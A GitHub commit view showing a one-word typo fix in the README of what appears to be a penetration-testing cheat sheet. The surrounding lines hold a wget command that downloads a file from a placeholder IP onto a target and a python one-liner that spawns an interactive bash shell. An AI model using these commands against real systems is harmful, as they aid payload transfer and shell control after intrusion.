Update README.md

This commit is contained in:
Joe Totes
2022-08-03 15:33:58 -04:00
committed by GitHub
parent f2c95d6678
commit ac0e36c95a

View File

@@ -386,7 +386,7 @@ wget http://{IP ADDRESS}/{FILE} -outfile {FILE}
```bash
# About: A command spawn a new shell using python
# Download: MAy or may not be installed on server machine
# Download: May or may not be installed on server machine
# Usage
python3 -c 'import pty;pty.spawn("/bin/bash")'